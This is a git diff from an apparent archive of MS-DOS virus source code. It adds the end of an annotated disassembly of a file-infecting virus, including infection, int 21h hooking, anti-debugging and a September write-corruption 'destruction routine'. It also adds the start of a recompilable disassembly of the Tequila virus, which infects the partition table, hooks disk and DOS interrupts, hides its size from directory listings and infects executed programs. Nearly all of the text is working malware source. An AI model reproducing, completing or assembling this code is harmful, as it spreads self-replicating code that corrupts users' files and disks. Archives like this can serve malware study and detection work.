big, EXIT ;1650 77 4D + mov cl,4 ;1652 B1 04 + shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8 + cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00 + mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C + mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000 + call s_15DF ;Set file pointer to BOF;1664 E8 FF78 + mov ax,8 ;to switch off virus ;1667 B8 0008 + mov es,ax ;166A 8E C0 + mov cx,20h ;bytes to write ;166C B9 0020 + mov dx,26Eh ;offset l_15EE ;166F.BA 026E + mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B + mov ah,40h ;write file ;1677 B4 40 + int 21h ;1679 CD 21 + mov cx,ax ;bytes written ;167B 8B C8 + call s_13B0 ;Move file ptr to EOF ;167D E8 FD30 + call s_15C7 ;write aligning bytes ;1680 E8 FF44 + + mov ax,8 ;switch off virus ;1683 B8 0008 + mov es,ax ;1686 8E C0 + mov cx,28h ;40 bytes ;1688 B9 0028 + mov dx,322h ;offset l_16A2 ;168B .BA 0322 + mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B + mov ah,40h ;write file ;1693 B4 40 + int 21h ;1695 CD 21 + mov cx,ax ;bytes written ;1697 8B C8 + call s_13E8 ;Calculate virus length ;1699 E8 FD4C + call s_15FE ;Write const part of vir;169C E8 FF5F +l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06 +s_13FD endp + + ;<-- COM type virus begin pattern +d_0322: push ds ;16A2 1E + push cs ;16A3 0E + pop ds ;16A4 1F + lea si,cs:[4F7h] ;16A5 8D 36 04F7 + mov di,0100h ;16A9.BF 0100 + mov cx,20h ;16AC B9 0020 + rep movsb ;16AF F3/ A4 + mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF + nop ;16B7 90 + pop ds ;16B8 1F + lea ax,cs:[54Fh] ;16B9 8D 06 054F + jmp ax ;16BD FF E0 + +;------ work area +d_033F dw 0020h ;oryg. file attr ;16BF 20 00 +d_0341 dw 05EAh ;const virus code length;16C1 EA 05 +d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00 +d_0345 dw 28h ;16C5 28 00 +d_0347 dw 200h ;size of header ;16C7 00 02 +d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00 + +;================================================================ +; init registers +;---------------------------------------------------------------- +s_16CA proc near + xor si,si ;16CA 33 F6 + xor di,di ;16CC 33 FF + xor ax,ax ;16CE 33 C0 + xor dx,dx ;16D0 33 D2 + xor bp,bp ;16D2 33 ED + retn ;16D4 C3 +s_16CA endp + +;================================================================ +; int 24h handling routine (infection time active only) +;---------------------------------------------------------------- +l_16D5: cmp di,0 ;16D5 83 FF 00 + jne l_16DD ;16D8 75 03 + mov al,3 ;ignore ;16DA B0 03 + iret ;16DC CF + +l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362 + +d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D + +;================================================================ +; Get int 24h +;---------------------------------------------------------------- +s_16E6 proc near + cli ; Disable interrupts ;16E6 FA + xor bx,bx ;16E7 33 DB + mov es,bx ;16E9 8E C3 + mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090 + mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362 + mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092 + mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364 + mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355 + mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092 + sti ;170A FB + retn ;170B C3 +s_16E6 endp + + +;================================================================ +; Restore int 24h vector +;---------------------------------------------------------------- +s_170C proc near + cli ;170C FA + xor bx,bx ;170D 33 DB + mov es,bx ;170F 8E C3 + mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362 + mov es:[90h],bx ;1716 26: 89 1E 0090 + mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364 + mov es:[92h],bx ;1720 26: 89 1E 0092 + sti ;1725 FB + retn ;1726 C3 +s_170C endp + +;=============================================================== +; write handle service routine (destruction routine) +;--------------------------------------------------------------- +s_1727 proc near + push ax ;1727 50 + push bx ;1728 53 + push cx ;1729 51 + push dx ;172A 52 + push es ;172B 06 + push ds ;172C 1E + push si ;172D 56 + push di ;172E 57 + mov ax,es ;172F 8C C0 + cmp ax,8 ;1731 3D 0008 + je l_1750 ;-> virus contamination ;1734 74 1A + cmp bx,4 ;1736 83 FB 04 + jb l_1750 ;-> BIOS ;1739 72 15 + mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A + int 21h ;173D CD 21 + cmp dh,9 ;september ? ;173F 80 FE 09 + jb l_1750 ;-> bellow ;1742 72 0C + pop di ;1744 5F + pop si ;1745 5E + pop ds ;1746 1F + pop es ;1747 07 + pop dx ;1748 5A + pop cx ;1749 59 + pop bx ;174A 5B + pop ax ;174B 58 + add dx,0Ah ;shift buffer address ;174C 83 C2 0A + retn ;174F C3 + +l_1750: pop di ;1750 5F + pop si ;1751 5E + pop ds ;1752 1F + pop es ;1753 07 + pop dx ;1754 5A + pop cx ;1755 59 + pop bx ;1756 5B + pop ax ;1757 58 + retn ;1758 C3 +s_1727 endp + + db 16 dup (0) ;not used ;1759 0010[00] + +;================================================================ +; Load & Execute service routine +;---------------------------------------------------------------- +s_1769 proc near + push ax ;1769 50 + push bx ;176A 53 + push cx ;176B 51 + push dx ;176C 52 + push es ;176D 06 + push ds ;176E 1E + push si ;176F 56 + push di ;1770 57 + mov si,dx ;file pathname ;1771 8B F2 + mov ax,cs ;1773 8C C8 + mov es,ax ;1775 8E C0 + mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F + mov cx,19h ;177A B9 0019 + rep movsb ;copy victim name ;177D F3/ A4 + call s_16E6 ;Get int 24h vector ;177F E8 FF64 + mov ds,ax ;ds:=cs ;1782 8E D8 + call s_13FD ;1784 E8 FC76 + call s_170C ;Restore int 24h vector ;1787 E8 FF82 + pop di ;178A 5F + pop si ;178B 5E + pop ds ;178C 1F + pop es ;178D 07 + pop dx ;178E 5A + pop cx ;178F 59 + pop bx ;1790 5B + pop ax ;1791 58 + retn ;1792 C3 +s_1769 endp + +;================================================================ +; New int 21h service routine +;---------------------------------------------------------------- + ;<---- 10 bytes to identify resident virus +d_0413: pushf ;1793 9C + cmp ah,40h ;write handle ? ;1794 80 FC 40 + jne l_179F ;-> no ;1797 75 06 + call s_1727 ;write handle service routine ;1799 E8 FF8B + jmp short l_17A7 ;179C EB 09 + nop ;179E 90 + +l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B + jne l_17A7 ;-> no ;17A2 75 03 + call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2 +l_17A7: popf ;17A7 9D + +;================================================================ +; Execute substituted code and jump into old int 21h service +;---------------------------------------------------------------- + ;<- four bytes from int 21h service +d_0428: cmp ah,51h ;17A8 80 FC 51 +d_042B: je l_17B2 ;17AB 74 05 + jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547 +l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D + +d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02 + +;================================================================ +; Make virus resident +;---------------------------------------------------------------- +s_17BB proc near + cli ;disable interrupts ;17BB FA + push es ;17BC 06 + lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413 + mov di,si ;17C1 8B FE + mov cx,9800h ;resident virus segment ;17C3 B9 9800 + mov es,cx ;17C6 8E C1 + mov cx,0Ah ;17C8 B9 000A + repe cmpsb ;17CB F3/ A6 + cmp cx,0 ;17CD 83 F9 00 + pop es ;17D0 07 + jz l_181A ;-> allready resident ;17D1 74 47 + mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084 + mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086 + mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549 + mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F + mov di,bx ;17E2 8B FB + mov es,ax ;17E4 8E C0 + mov cx,80h ;17E6 B9 0080 + mov al,80h ;17E9 B0 80 +l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE + cmp cx,0 ;17ED 83 F9 00 + je l_1870 ;-> not found, EXIT ;17F0 74 7E + cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC + jne l_17EB ;-> find another place ;17F6 75 F3 + + ;<- get four bytes from int 21h service + mov al,es:[di+2] ;17F8 26: 8A 45 02 + mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B + mov al,es:[di-1] ;1800 26: 8A 45 FF + mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428 + mov al,es:[di] ;1808 26: 8A 05 + mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429 + mov al,es:[di+1] ;180F 26: 8A 45 01 + mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A + jmp short l_1821 ;1817 EB 08 + nop ;1819 90 + + ;<- allready resident +l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54 + nop ;181C 90 + +d_049D dw 140Dh ;address to jump1 into ;181D 0D 14 +d_049F dw 0278h ;old int 21h segment ;181F 78 02 + +l_1821: mov ax,di ;1821 8B C7 + add ax,4 ;next to conditional jmp;1823 05 0004 + xor bx,bx ;1826 33 DB + mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03 + add ax,bx ;jump address ;182C 03 C3 + mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D + cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80 + jb l_183E ;-> forward jump ;1836 72 06 + ;<- jump backwards + sub ax,100h ;minus carry ;1838 2D 0100 + mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D +l_183E: add di,4 ;second condition addrs ;183E 83 C7 04 + mov word ptr ds:[547h],di ;1841 89 3E 0547 + sub di,5 ;<- area to substitute ;1845 83 EF 05 + push es ;1848 06 + push di ;1849 57 + mov dx,9800h ;resident virus segment ;184A BA 9800 + mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5 + mov es,dx ;1852 8E C2 + xor si,si ;1854 33 F6 + xor di,di ;1856 33 FF + mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612 + rep movsb ;copy virus code ;185B F3/ A4 + + ;<----- take control over int 21h + lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413 + mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3 + pop di ;1865 5F + pop es ;1866 07 + mov cx,5 ;1867 B9 0005 + lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2 + rep movsb ;186E F3/ A4 +l_1870: sti ;1870 FB + retn ;1871 C3 +s_17BB endp + + ;<---- instruction pattern to write over int 21h code +d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA +d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00 +d_04F5 dw 9800h ;resident virus segment ;1875 00 98 + +;================================================ +; saved 32 victim bytes +;------------------------------------------------ +d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11 + db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72 + ;1880 74 65 64 00 00 00 00 + db 'MZ' ;1887 4D 5A + db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00 + db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF + db 98h,00h ;1895 98 00 00 + +;----------------------------------- + db 48 dup (0) ;not used ;1897 0030[00] + +d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14 +d_0549 dw 0278h ;old int 21h segment ;18C9 78 02 + + ;<------ code writed to in case of paragraf alignement + db 0E9h ;jmp l_18CF ;18CB E9 +d_054C dw 052Ch ;distance of jump ;18CC 2C 05 + db 0 ;18CE 00 + +;================================================================ +; EXE virus entry +;---------------------------------------------------------------- +l_18CF: push bx ;18CF 53 + push cx ;18D0 51 + push es ;18D1 06 + push ds ;18D2 1E + pushf ;18D3 9C + mov ax,cs ;18D4 8C C8 + mov ds,ax ;18D6 8E D8 + call s_1938 ;make virus resident ;18D8 E8 005D + cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF + je l_18E5 ;18E0 74 03 + jmp short l_1953 ;-> ? ;18E2 EB 6F + nop ;18E4 90 + +;================================================================ +; End of virus code - file *.COM +;---------------------------------------------------------------- +l_18E5: popf ;18E5 9D + pop ds ;18E6 1F + pop es ;18E7 07 + pop cx ;18E8 59 + pop bx ;18E9 5B + mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100 + mov ax,es ;18F1 8C C0 + mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6 + call s_16CA ;init registers ;18F7 E8 FDD0 + jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4 + + ;<--- victim name +d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53 + ;1905 2E 43 4F 4D + db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00 + db 9 dup (0) ;190F 0009[00] + +;================================================================ +; ANTYDEBUG - make virus resident +;---------------------------------------------------------------- +s_1918 proc near + cmp ax,3000h ;1918 3D 3000 + jne l_1925 ;-> int 3 ;191B 75 08 + call s_17BB ;-> make virus resident ;191D E8 FE9B + retn ;1920 C3 +s_1918 endp + +d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00 +d_05A3 dw 1388h ;victim SP ;1923 88 13 + +;================================================================ +; ANTYDEBUG - call int 3 (Breakpoint) +;---------------------------------------------------------------- +s_1925 proc near +l_1925: mov ax,3000h ;Flag register ;1925 B8 3000 + push ax ;1928 50 +l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C + cmp ax,3000h ;192E 3D 3000 + jne l_1929 ;1931 75 F6 + retn ;1933 C3 +s_1925 endp + +d_05B4 dw 0000h ;victim IP ;1934 00 00 +d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00 + +;================================================================ +; Make virus resident +;---------------------------------------------------------------- +s_1938 proc near + push es ;1938 06 + call s_1948 ;-> INT 1 (single step) ;1939 E8 000C + cmp ax,0 ;193C 3D 0000 + jne l_1947 ;193F 75 06 + call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1 + call s_1918 ;-> reside virus ;1944 E8 FFD1 +l_1947: pop es ;1947 07 + +;================================================================ +; ANTYDEBUG - call int 1 = Single Step +;---------------------------------------------------------------- +s_1948: pushf ;1948 9C + xor ax,ax ;1949 33 C0 + mov es,ax ;194B 8E C0 + call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004 + retn ;1952 C3 +s_1938 endp + +;================================================================ +; End of virus code - file *.EXE +;---------------------------------------------------------------- +l_1953: popf ;1953 9D + pop ds ;1954 1F + pop es ;1955 07 + pop cx ;1956 59 + pop bx ;1957 5B + mov ax,es ;1958 8C C0 + add ax,10h ;relocating value ;195A 05 0010 + mov dx,ax ;195D 8B D0 + mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1 + add bp,ax ;1964 03 E8 + mov ss,bp ;1966 8E D5 + mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3 + mov sp,bp ;196D 8B E5 + mov ax,dx ;196F 8B C2 + add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6 + call s_16CA ;init registers ;1976 E8 FD51 + jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4 + + db 20 dup (0) ;COM file stack ;197E 0014[00] + +d_0612 label byte ;1992h + +seg_a ends + + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tequila.asm b/MSDOS/Virus.MSDOS.Unknown.tequila.asm new file mode 100644 index 00000000..21c7eba8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tequila.asm @@ -0,0 +1,1089 @@ + ;============================= + ; the tequila virus = + ; a recompilable = + ; dis-assembly = + ; specifically designed = + ; for assembly to a COM file = + ; with the A86 assembler. = + ; ++++++++++++++++++ = + ; If you desire a "perfect" = + ; byte for byte source code = + ;match-up, the MASM assembler= + ; must be used and the noted = + ;instructions must be changed= + ; to comply with MASM syntax.= + ; In addition, all byte and = + ;word pointer references must= + ; be changed from B and W to = + ; BYTE POINTER and WORD = + ; POINTER. = + ;============================= + + +CODE_SEG SEGMENT +ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG +ORG 0100 +TEQUILA PROC NEAR + +JMP START + + DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH + DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH + + DB 00DH, 00AH, 00DH, 00AH + DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH + DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/" + DB "Switzerland.", 00DH, 00AH + DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH + DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH + DB "$" + + DB "Execute: mov ax, FE03 / int 21. Key to go on!" + + +PROGRAM_TERMINATION_ROUTINE: + PUSH BP + MOV BP,SP + SUB SP,0CH + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH ES + PUSH DS + PUSH CS + POP DS + MOV AX,W[6] + INC AX + JE 0243H ;Masm Mod. Needed + DEC AX + JNE 020DH ;Masm Mod. Needed + DEC W[8] ;Masm Mod. Needed + JNE 0243H ;Masm Mod. Needed + JMP 0246H ;Masm Mod. Needed + MOV AH,02AH + CALL INT_21 + MOV SI,CX + MOV CX,W[8] + CMP CL,DL + JNE 022FH ;Masm Mod. Needed + MOV AX,SI + SUB AX,W[6] + MUL B[011H] ;Masm Mod. Needed + ADD AL,DH + ADD CH,3 + CMP AL,CH + JAE 0237H ;Masm Mod. Needed + MOV W[6],0FFFFH ;Masm Mod. Needed + JMP 0243H ;Masm Mod. Needed + MOV W[6],0 ;Masm Mod. Needed + MOV W[8],3 ;Masm Mod. Needed + JMP 02DF ;Masm Mod. Needed + MOV BX,0B800H + INT 011 + AND AX,030H + CMP AX,030H + JNE 0256H ;Masm Mod. Needed + MOV BX,0B000H + MOV ES,BX + XOR BX,BX + MOV DI,0FD8FH + MOV SI,0FC18H + MOV W[BP-2],SI + MOV W[BP-4],DI + MOV CX,01E + MOV AX,W[BP-2] + IMUL AX + MOV W[BP-8],AX + MOV W[BP-6],DX + MOV AX,W[BP-4] + IMUL AX + MOV W[BP-0C],AX + MOV W[BP-0A],DX + ADD AX,W[BP-8] + ADC DX,W[BP-6] + CMP DX,0F + JAE 02B0 ;Masm Mod. Needed + MOV AX,W[BP-2] + IMUL W[BP-4] + IDIV W[0F] ;Masm Mod. Needed + ADD AX,DI + MOV W[BP-4],AX + MOV AX,W[BP-8] + MOV DX,W[BP-6] + SUB AX,W[BP-0C] + SBB DX,W[BP-0A] + IDIV W[0D] ;Masm Mod. Needed + ADD AX,SI + MOV W[BP-2],AX + LOOP 0269 ;Masm Mod. Needed + INC CX + SHR CL,1 + MOV CH,CL + MOV CL,0DB + ES MOV W[BX],CX ;Masm Mod. Needed + INC BX + INC BX + ADD SI,012 + CMP SI,01B8 + JL 0260 ;Masm Mod. Needed + ADD DI,034 + CMP DI,02A3 + JL 025D ;Masm Mod. Needed + XOR DI,DI + MOV SI,0BB + MOV CX,02D + CLD + MOVSB + INC DI + LOOP 02D7 ;Masm Mod. Needed + XOR AX,AX + INT 016 + POP DS + POP ES + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + MOV SP,BP + POP BP + RET + +PRINT_MESSAGE: + PUSH DX + PUSH DS + PUSH CS + POP DS + MOV AH,9 + MOV DX,012 + CALL INT_21 + POP DS + POP DX + RET + +NEW_PARTITION_TABLE: + CLI + XOR BX,BX + MOV DS,BX + MOV SS,BX + MOV SP,07C00 + STI + XOR DI,DI + SUB W[0413],3 ;Masm Mod. Needed + INT 012 + MOV CL,6 + SHL AX,CL + MOV ES,AX + PUSH ES + MOV AX,022A + PUSH AX + MOV AX,0205 + MOV CX,W[07C30] + INC CX + MOV DX,W[07C32] + INT 013 + RETF + +DB 002, 0FE +DB 04C, 0E9 +DB 080, 004 + + PUSH CS + POP DS + XOR AX,AX + MOV ES,AX + MOV BX,07C00 + PUSH ES + PUSH BX + MOV AX,0201 + MOV CX,W[0226] + MOV DX,W[0228] + INT 013 + PUSH CS + POP ES + CLD + MOV SI,0409 + MOV DI,09BE + MOV CX,046 + REP MOVSB + MOV SI,091B + MOV DI,0A04 + MOV CX,045 + REP MOVSB + CLI + XOR AX,AX + MOV ES,AX + ES LES BX,[070] ;Masm Mod. Needed + MOV W[09B0],BX ;Masm Mod. Needed + MOV W[09B2],ES ;Masm Mod. Needed + MOV ES,AX + ES LES BX,[084] ;Masm Mod. Needed + MOV W[09B4],BX ;Masm Mod. Needed + MOV W[09B6],ES ;Masm Mod. Needed + MOV ES,AX + ES MOV W[070],044F ;Masm Mod. Needed + ES MOV W[072],DS ;Masm Mod. Needed + STI + RETF + +INSTALL: + CALL NEXT_LINE + NEXT_LINE: + POP SI + SUB SI,028F + PUSH SI + PUSH AX + PUSH ES + PUSH CS + POP DS + MOV AX,ES + ADD W[SI+2],AX + ADD W[SI+4],AX + DEC AX + MOV ES,AX + MOV AX,0FE02 + INT 021 + CMP AX,01FD + JE NO_PARTITION_INFECTION + ES CMP B[0],05A ;Masm Mod. Needed + JNE NO_PARTITION_INFECTION + ES CMP W[3],0BB ;Masm Mod. Needed + JBE NO_PARTITION_INFECTION + ES MOV AX,W[012] ;Masm Mod. Needed + SUB AX,0BB + MOV ES,AX + XOR DI,DI + MOV CX,09A4 + CLD + REP MOVSB + PUSH ES + POP DS + CALL INFECT_PARTITION_TABLE + NO_PARTITION_INFECTION: + POP ES + POP AX + PUSH ES + POP DS + POP SI + CS MOV SS,W[SI+4] ;Masm Mod. Needed + CHAIN_TO_THE_HOST_FILE: + CS JMP D[SI] ;Masm Mod. Needed + +INFECT_PARTITION_TABLE: + MOV AH,02A + INT 021 + MOV W[6],CX ;Masm Mod. Needed + MOV W[8],DX ;Masm Mod. Needed + MOV AH,052 + INT 021 + ES MOV AX,W[BX-2] ;Masm Mod. Needed + MOV W[03E8],AX ;Masm Mod. Needed + MOV AX,03513 + INT 021 + MOV W[09A0],BX ;Masm Mod. Needed + MOV W[09A2],ES ;Masm Mod. Needed + MOV AX,03501 + INT 021 + MOV SI,BX + MOV DI,ES + MOV AX,02501 + MOV DX,03DA + INT 021 + MOV B[0A],0 ;Masm Mod. Needed + PUSHF + POP AX + OR AX,0100 + PUSH AX + POPF + MOV AX,0201 + MOV BX,09A4 + MOV CX,1 + MOV DX,080 + PUSH DS + POP ES + PUSHF + CALL D[09A0] ;Masm Mod. Needed + PUSHF + POP AX + AND AX,0FEFF + PUSH AX + POPF + PUSHF + MOV AX,02501 + MOV DX,SI + MOV DS,DI + INT 021 + POPF + JAE 0450 ;Masm Mod. Needed + JMP RET ;Masm Mod. Needed + PUSH ES + POP DS + CMP W[BX+02E],0FE02 + JNE 045C ;Masm Mod. Needed + JMP RET ;Masm Mod. Needed + ADD BX,01BE + MOV CX,4 + MOV AL,B[BX+4] + CMP AL,4 + JE 0479 ;Masm Mod. Needed + CMP AL,6 + JE 0479 ;Masm Mod. Needed + CMP AL,1 + JE 0479 ;Masm Mod. Needed + ADD BX,010 + LOOP 0463 ;Masm Mod. Needed + JMP SHORT RET ;Masm Mod. Needed + MOV DL,080 + MOV DH,B[BX+5] + MOV W[0228],DX ;Masm Mod. Needed + MOV AX,W[BX+6] + MOV CX,AX + MOV SI,6 + AND AX,03F + CMP AX,SI + JBE RET ;Masm Mod. Needed + SUB CX,SI + MOV DI,BX + INC CX + MOV W[0226],CX ;Masm Mod. Needed + MOV AX,0301 + MOV BX,09A4 + PUSHF + CALL D[09A0] ;Masm Mod. Needed + JB RET ;Masm Mod. Needed + DEC CX + MOV W[DI+6],CX + INC CX + SUB W[DI+0C],SI + SBB W[DI+0E],0 + MOV AX,0305 + MOV BX,0 + INC CX + PUSHF + CALL D[09A0] ;Masm Mod. Needed + JB RET ;Masm Mod. Needed + MOV SI,01F6 + MOV DI,09A4 + MOV CX,034 + CLD + REP MOVSB + MOV AX,0301 + MOV BX,09A4 + MOV CX,1 + XOR DH,DH + PUSHF + CALL D[09A0] ;Masm Mod. Needed + RET + +NEW_INTERRUPT_ONE: + PUSH BP + MOV BP,SP + CS CMP B[0A],1 ;Masm Mod. Needed + JE 0506 ;Masm Mod. Needed + CMP W[BP+4],09B4 + JA 050B ;Masm Mod. Needed + PUSH AX + PUSH ES + LES AX,[BP+2] + CS MOV W[09A0],AX ;Masm Mod. Needed + CS MOV W[09A2],ES ;Masm Mod. Needed + CS MOV B[0A],1 + POP ES + POP AX + AND W[BP+6],0FEFF + POP BP + IRET + +NEW_INTERRUPT_13: + CMP CX,1 + JNE 054E ;Masm Mod. Needed + CMP DX,080 + JNE 054E ;Masm Mod. Needed + CMP AH,3 + JA 054E ;Masm Mod. Needed + CMP AH,2 + JB 054E ;Masm Mod. Needed + PUSH CX + PUSH DX + DEC AL + JE 0537 ;Masm Mod. Needed + PUSH AX + PUSH BX + ADD BX,0200 + INC CX + PUSHF + CS CALL D[09A0] ;Masm Mod. Needed + POP BX + POP AX + MOV AL,1 + CS MOV CX,W[0226] ;Masm Mod. Needed + CS MOV DX,W[0228] ;Masm Mod. Needed + PUSHF + CS CALL D[09A0] ;Masm Mod. Needed + POP DX + POP CX + RETF 2 + CS JMP D[09A0] ;Masm Mod. Needed + +NEW_TIMER_TICK_INTERRUPT: + PUSH AX + PUSH BX + PUSH ES + PUSH DS + XOR AX,AX + MOV ES,AX + PUSH CS + POP DS + ES LES BX,[084] ;Masm Mod. Needed + MOV AX,ES + CMP AX,0800 + JA 05B0 ;Masm Mod. Needed + CMP AX,W[09B6] + JNE 0575 ;Masm Mod. Needed + CMP BX,W[09B4] + JE 05B0 ;Masm Mod. Needed + MOV W[09B4],BX ;Masm Mod. Needed + MOV W[09B6],ES ;Masm Mod. Needed + XOR AX,AX + MOV DS,AX + CS LES BX,[09B0] ;Masm Mod. Needed + MOV W[070],BX ;Masm Mod. Needed + MOV W[072],ES ;Masm Mod. Needed + LES BX,[04C] ;Masm Mod. Needed + CS MOV W[09A0],BX ;Masm Mod. Needed + CS MOV W[09A2],ES ;Masm Mod. Needed + MOV W[04C],09BE ;Masm Mod. Needed + MOV W[04E],CS ;Masm Mod. Needed + MOV W[084],04B1 ;Masm Mod. Needed + MOV W[086],CS ;Masm Mod. Needed + POP DS + POP ES + POP BX + POP AX + IRET + +INT_21_INTERCEPT: + CMP AH,011 + JB CHECK_FOR_HANDLE + CMP AH,012 + JA CHECK_FOR_HANDLE + CALL ADJUST_FCB_MATCHES + RETF 2 + CHECK_FOR_HANDLE: + CMP AH,04E + JB CHECK_FOR_PREVIOUS_INSTALLATION + CMP AH,04F + JA CHECK_FOR_PREVIOUS_INSTALLATION + CALL ADJUST_HANDLE_MATCHES + RETF 2 + CHECK_FOR_PREVIOUS_INSTALLATION: + CMP AX,0FE02 + JNE CHECK_FOR_MESSAGE_PRINT + NOT AX + IRET + CHECK_FOR_MESSAGE_PRINT: + CMP AX,0FE03 + JNE CHECK_FOR_EXECUTE + CS CMP W[6],0 ;Masm Mod. Needed + JNE CHAIN_TO_TRUE_INT_21 + CALL PRINT_MESSAGE + IRET + CHECK_FOR_EXECUTE: + CMP AX,04B00 + JE SET_STACK + CMP AH,04C + JNE CHAIN_TO_TRUE_INT_21 + SET_STACK: + CS MOV W[09A6],SP ;Masm Mod. Needed + CS MOV W[09A8],SS ;Masm Mod. Needed + CLI + PUSH CS + POP SS + MOV SP,0AE5 + STI + CMP AH,04C + JNE TO_AN_INFECTION + CALL PROGRAM_TERMINATION_ROUTINE + JMP SHORT NO_INFECTION + TO_AN_INFECTION: + CALL INFECT_THE_FILE + NO_INFECTION: + CLI + CS MOV SS,W[09A8] ;Masm Mod. Needed + CS MOV SP,W[09A6] ;Masm Mod. Needed + STI + JMP SHORT CHAIN_TO_TRUE_INT_21 + CHAIN_TO_TRUE_INT_21: + CS INC W[09BC] ;Masm Mod. Needed + CS JMP D[09B4] ;Masm Mod. Needed + +NEW_CRITICAL_ERROR_HANDLER: + MOV AL,3 + IRET + +ADJUST_FCB_MATCHES: + PUSH BX + PUSH ES + PUSH AX + MOV AH,02F + CALL INT_21 + POP AX + PUSHF + CS CALL D[09B4] ;Masm Mod. Needed + PUSHF + PUSH AX + CMP AL,0FF + JE 0664 ;Masm Mod. Needed + ES CMP B[BX],0FF ;Masm Mod. Needed + JNE 064F ;Masm Mod. Needed + ADD BX,7 + ES MOV AL,B[BX+017] ;Masm Mod. Needed + AND AL,01F + CMP AL,01F + JNE 0664 ;Masm Mod. Needed + ES SUB W[BX+01D],09A4 ;Masm Mod. Needed + ES SBB W[BX+01F],0 ;Masm Mod. Needed + POP AX + POPF + POP ES + POP BX + RET + +ADJUST_HANDLE_MATCHES: + PUSH BX + PUSH ES + PUSH AX + MOV AH,02F + CALL INT_21 + POP AX + PUSHF + CS 